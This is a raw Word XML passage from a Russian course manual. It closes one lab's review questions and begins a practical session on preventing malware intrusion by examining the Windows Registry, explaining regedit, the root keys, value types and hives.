        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие действия осуществляются для выполнения хода лаборато</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ной работы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие изменения были внесены в файл?</w:t>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47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как и с помощью чего можно обнаружить программу вносящую изменение в исполняемые файлы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="129" w:name="_Toc503720807"/>
      <w:bookmarkStart w:id="130" w:name="_Toc3811334"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие </w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Профилактика проникновения вредоносн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>го программного обеспечения посредством исследования Реестра ОС Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>практическое освоение студентами научно-теоретических полож</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ний дисциплины по вопросам защиты информации от воздействия вредоносн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го программного обеспечения на основе использования методов и средств пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>филактики вирусных атак, а также овладение ими техникой экспериментальных исследований и анализа полученных результатов, привитие навыков работы с вычислительной техникой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5962"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5962"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Реестр операционной системы Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- это большая база данных, где хранится информация о конфигурации системы. Этой информацией пользуются как операционная система Windows, так и другие программы. В некоторых сл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чаях восстановить работоспособность системы после сбоя можно, загрузив р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ботоспособную версию реестра, но для этого, естественно, необходимо иметь копию реестра. Основным средством для' просмотра и редактирования записей реестра служит специализированная утилита </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Редактор реестра».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл редактора реестра находится в папке Windows. Называется он </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">regedit.exe. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2849880" cy="28117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49880" cy="2811780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>После запуска появится окно редактора реестра. Вы увидите список из 5 разделов (рисунок 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4983480" cy="16306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83480" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HKEY_USERS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_CONFIG.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Работа с разделами реестра аналогична работе с папками в Проводнике. Конечным элементом дерева реестра являются ключи или параметры, делящи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся на три типа (рис. 2):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5836920" cy="2552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6920" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="446"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>строковые (напр. «C:\Windows»);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="446"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>двоичные (напр. 10 82 АО 8F);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="446"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DWORD - этот тип ключа занимает 4 байта и отображается в шес</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>надцатеричном и в десятичном виде (например, 0x00000020 (32)).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В Windows системная информация разбита на так называемые </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ульи (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hive</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Это обусловлено принципиальным отличием концепции безопасности этих операционных систем. Имена файлов ульев и пути к каталогам, в которых они хранятся, расположены в разделе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Contro!\hivelist</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(рис. 3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5463540" cy="2438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63540" cy="243840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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В таблице 1 даны краткие описания ульев реестра и файлов, в которых хранятся параметры безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 1 Характеристика основных разделов системного Реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="40" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="40" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4514"/>
        <w:gridCol w:w="5090"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="905"/>
